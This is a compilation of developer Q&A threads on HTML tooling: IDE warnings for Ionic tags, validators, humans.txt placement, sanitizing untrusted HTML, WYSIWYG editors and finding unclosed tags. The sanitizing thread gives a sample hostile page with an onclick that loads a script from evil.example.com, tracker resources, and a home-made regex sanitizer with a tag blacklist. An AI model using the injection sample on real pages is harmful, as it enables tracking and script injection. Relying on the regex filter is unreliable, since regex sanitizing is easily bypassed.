Can I stop ReSharper objecting to Ionic HTML tags? - html

I've just opened my first Ionic based mobile project, and the HTML templates are really full of Ionic tags, like <ion-modal-view>, which courtesy, ReSharper (I deeply suspect), has a wavy blue underline, as do half the other tags in the template. I deplore working with these lines on the screen, as they indicate there is something wrong (OK, maybe for the W3C it is wrong), when there is nothing wrong. Can, and how, I get rid of these damned blue lines?

Well I'm a big believer in writing valid html. Standards are there for a reason, and we can't complain about Microsoft not following them with IE if we don't follow them ourselves.
I did some searching and couldn't find any information on whether Ionic could be written as valid html.
So personally were I in your position I'd either consider whether writing an XHTML DTD that supported Ionic's mark-up was an option, or chose a framework that I could write valid mark-up in.
Since I'm guessing neither of those is an option you could go to:
Resharper -> Options -> Code Inspection -> Settings
Look for the section under the heading Elements to skip -
Either find File masks and add *.html (or whatever other file extension you might be using) or find Files and folders and mark the specific files/folders that you don't want Resharper to look at.

I want to suggest a better alternative.
Instead of skipping inspections of all *.html files it should be possible to just ignore the inspection for Unknown Tags:

Related

Switch browser to a strict mode in order to write proper html code

Is it possible to switch a browser to a "strict mode" in order to write proper code at least during the development phase?
I see always invalid, dirty html code (besides bad javascript and css) and I feel that one reason is also the high tolerance level of all browsers. So at least I would be ready to have a stricter mode while I use the browser for the development for the pages in order to force myself to proper code.
Is there anything like that with any of the known browser?
I know about w3c-validator but honestly who is really using this frequently?
Is there maybe some sort of regular interface between browser and validator? Are there any development environments where the validation is tested automatically?
Is there anything like that with any of the known browser? Is there maybe some sort of regular interface between browser and validator? Are there any development environments where the validation is tested automatically?
The answer to all those questions is “No“. No browsers have any built-in integration like what you describe. There are (or were) some browser extensions that would take every single document you load and send it to the W3C validator for checking, but using one of those extensions (or anything else that automatically sends things to the W3C validator in the background) is a great way to get the W3C to block your IP address (or the IP-address range for your entire company network) for abuse of W3C services.
I know about w3c-validator but honestly who is really using this frequently?
The W3C validator currently processes around 17 requests every second—around 1.5 million documents every day—so I guess there are quite a lot of people using it frequently.
I see always invalid, dirty html code… I would be ready to have a stricter mode while I use the browser for the development for the pages in order to force myself to proper code.
I'm not sure what specifically you mean by “dirty html code” or “proper code“ but I can say that there are a lot of markup cases that are not bad or invalid but which some people mistakenly consider bad.
For example, some people think every <p> start tag should always have a matching </p> end tag but the fact is that from the time when HTML was created, it has never required documents to always have matching </p> end tags in all cases (in fact, when HTML was created, the <p> element was basically an empty element—not a container—and so the <p> tag simply was a marker.
Another example of a case that some people mistakenly think of as bad is the case of unquoted attribute values; e.g., <link rel=stylesheet …>. But that fact is that unless an attribute value contains spaces, it generally doesn't need to be quoted. So in fact there's actually nothing wrong at all with a case like <link rel=stylesheet …>.
So there's basically no point in trying to find a tool or mechanism to check for cases like that, because those cases are not actually real problems.
All that said, the HTML spec does define some markup cases as being errors, and those cases are what the W3C validator checks.
So if you want to catch real problems and be able to fix them, the answer is pretty simple: Use the W3C validator.
Disclosure: I'm the maintainer of the W3C validator. 😀
As #sideshowbarker notes, there isn't anything built in to all browsers at the moment.
However I do like the idea and wish there was such a tool also (that's how I got to this question)
There is a "partial" solution, in that if you use Firefox, and view the source (not the developer tools, but the CTRL+U or right click "View Page Source") Firefox will highlight invalid tag nesting, and attribute issues in red in the raw HTML source. I find this invaluable as a first pass looking at a page that doesn't seem to be working.
It is quite nice because it isn't super picky about the asdf id not being quoted, or if an attribute is deprecated, but it highlights glitchy stuff like the spacing on the td attributes is messed up (this would cause issues if the attributes were not quoted), and it caught that the span tag was not properly closed, and that the script tag is outside of the html tag, and if I had missed the doctype or had content before it, it flags that too.
Unfortunately "seeing" these issues is a manual process... I'd love to see these in the dev console, and in all browsers.
Most plugins/extensions only get access to the DOM after it has been parsed and these errors are gone or negated... however if there is a way to get the raw HTML source in one of these extension models that we can code an extension for to test for these types of errors, I'd be more than willing to help write one (DM #scunliffe on Twitter). Alternatively this may require writing something at a lower level, like a script to run in Fiddler.

Where to place the humans.txt file if I cannot put it on the site root?

Background
I'm building a web application for a client.
This app will be accessible to the world and will be placed in a directory (e.g., /my-app) in web-root. A subdomain isn't an option as they don't want to cough up the dough for another SSL cert.
/my-app is the only directory that I'm allowed to touch (unreasonable IT guys).
I'm using an icon set which requires attribution.
I've contacted the original author of the icon set and have gotten permission to link back to his work in the THANKS section of a humans.txt file.
I also feel like I should mention some other people's work. This information combined with the above will probably take up a good 20 lines, so a separate file like humans.txt seems like an ideal place to put this considering that I'll be serving minified markup, CSS, and script files.
Questions
Since I'm not allowed to place a humans.txt file in web-root, (and even if I was, it wouldn't really make much sense to put it there as it only applies to the /my-app portion of the site) is it acceptable to do the following:
Create: /my-app/humans.txt
Place: <link rel="author" href="//example.com/my-app/humans.txt"> in my markup
I'll be serving strict HTML 4.01 and the author value for the rel attribute doesn't seem to be a recognized link type in that specification. Do I need to do anything extra to define the author link type, or is the act of using it enough?
I don't even know if there are any non-spider tools that actually use this file at the moment, but I'd like to minimize the chance of this not working in the future when something does come along.
I think it is ok to put the file in the applications own directory, since it clarifies that it is specific to the content inside the directory and not all the other stuff you might find in the root directory.
Of course it would be nice if there are 0 errors in HTML strict mode. However this is one situation where you have to decide if you want to
keep up with the standard and not insert the meta tag (maybe put it in a comment or as a real link in a credits page)
ignore the standard, because the standard is nice but not the holy grail (there are quite worse errors you can make than that)
chose another Doctype, which allows you to use the meta tag you want, but to test again if all browsers render the new Doctype correctly
However I can not make this decision for you ;)

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?

WYSIWYG browser editor that generates *good* HTML?

I'm searching for a "suck less" WYSIWYG in-browser X?HTML editor that generates good HTML code.
(no <font>, <foo style="...">, <p></p><span></span><p><span> </span><span><span>blah</span></<span></p> and so on -- <b> and <i> etc is ok).
Should be easy-to-use as it is going to be used by people that do not know what HTML is.
Any suggestions?
Extra points for Copy-and-Paste-from-Word-readiness! :-)
(I found a lot of editors but they all create that <font> and nested <span> crap that breaks site design and bloats a site with one table up to 100kB.)
Download the current version of CKEditor and look at the XHTML output sample. It shows how to use full WYSIWYG but it doesn't generates font or styles. You just need to adjust the configuration to your needs.
What about WYMEditor?
WYMeditor has been created to generate perfectly structured XHTML strict code, to conform to the W3C XHTML specifications and to facilitate further processing by modern applications.
With WYMeditor, the code can't be contaminated by visual informations like font styles and weights, borders, colors, ... The end-user defines content meaning, which will determine its aspect by the use of style sheets. The result is easy and quick maintenance of information.
I've used it a little and while it takes quite a bit of tweaking if you have very specific needs, it does work out of the box for simple XHTML editing. If you set up specially annotated CSS files then it will detect the styles you want users to use and block level elements to which they apply. You can also tell it how to display these styles in the editor (which might be different from how you want them displayed in the resulting XHTML).
Of course, it generates XHTML, not HTML, so it may not meet your exact needs.
Wikipedia has a category for them:
http://en.wikipedia.org/wiki/Category:JavaScript-based_HTML_editors
You can use Markdown with the WMD UI, it's the one used by Stack Overflow. It always produces valid HTML code.
I just recently searched for an editor to create solid documentation, whose output is suitable for Subversion diffs: https://superuser.com/questions/126621/wysiwyg-editor-for-structured-text-suitable-for-svn-versioning
The editor that was suggested - "KompoZer" - turned out to be fantastic, especially because it generates very clean HTML (in my opinion). And I say that, although I had originally preferred something leaner than HTML.
P.S. Reading your question again, I'm not sure, what you mean with a "browser editor" - are you looking for an editor that can be integrated in an HTML page? KompoZer is based on a browser, but it can probably not be integrated in an HTML page.
I recently switched one of my projects to markdown to avoid this exact issue. There's still a bit of a learning curve for the users but I haven't had to deal with the usual issues that occur when they copy/paste content from Word and wonder why it blew up.
Having said that, I prefer CKEditor over TinyMCE and the Telerik controls. I've generally found it generates somewhat cleaner HTML.
There are several WYSIWG editors for embedding within your website out there.
WYMeditor (http://www.wymeditor.org/) looks very nice and seems to be a good fit for targetting clean and valid XHTML results.
Spaw2. Although it's kinda abandoned now.
The Apple Cocoa NSTextView class exports quite nice html, where all the fiddling is done through specifying a style sheet in the header. The Apple TextEdit editor uses this.
http://tinymce.moxiecode.com/ - easy to use, can import form Word, and restrict formatting to predefined CSS styles, to provide consistent output.
This post is 8+ years old now but still relevant...
I found an awesome github page with a curated list of WYSIWYG editors, including a few WYSIWYM ones which guarantee sane html. As of 2018, the most current and best WYSIWYM one looks like ProseMirror, or maybe ORY Editor if you're looking for something to edit entire webpages(!) in one textfield.

How do you find mismatched tags in HTML?

I've inherited some rather large static HTML files that need to be fixed up to work in webkit-based browsers, Safari in particular. One of the common bugs I've found that cause rendering differences is missing </div> tags. (Both IE7+ and FF3+ seem to ignore these, or make good guesses as to where to close the DIVs, and render as expected.) I'm used to using vim with HTML syntax highlighting for editing, but end up writing awk scripts to match starting and ending tags.
What is your favorite tool or technique for matching start and end tags in a large HTML file?
UPDATE: I'm currently in a shop that targets HTML 4.01 Strict, not XHTML.
The W3C HTML Validator works fairly well, or if you want something a little simpler then the Tidy FireFox plugin also works.
The w3c Validator can be (extremely) verbose, but it does check for missing closing tags.
HTML Tidy is a great command line tool. I often use it with WGet
Most IDE's usually let you know via highlighting, fuzzy-underline or a warning.
Div Checker is a great tool that focuses on div tags specifically.
While other tools were only able to tell me that "some tag was missing somewhere".
Div-Checker removes other tags, code, and most comments, to create a clean visual structure of just the divs themselves.
From this div map, it's fairly easy to see if nested divs are correctly paired !
I was able to locate a missing div left out by a wordpress theme developer, with the help of this tool.
Here is the Posted Answer from #noah-whitmore that enlightened me to this awesome tool.
There are a couple other useful tools mentioned in that thread as well, such as unclosed-tag-finder (visually not so easy to read, but helpful if your missing tag is not a div).
vim/gvim & NetBeans both do a great job of tag matching
What is your favorite tool or technique for matching start and end tags in a large HTML file?
A text editor with a built-in XML well-formedness checker, combined with using XHTML for everything.
Sublime Text with the Tag plugin has a Tag Lint feature which which aims to check correctness of opened and closed tags.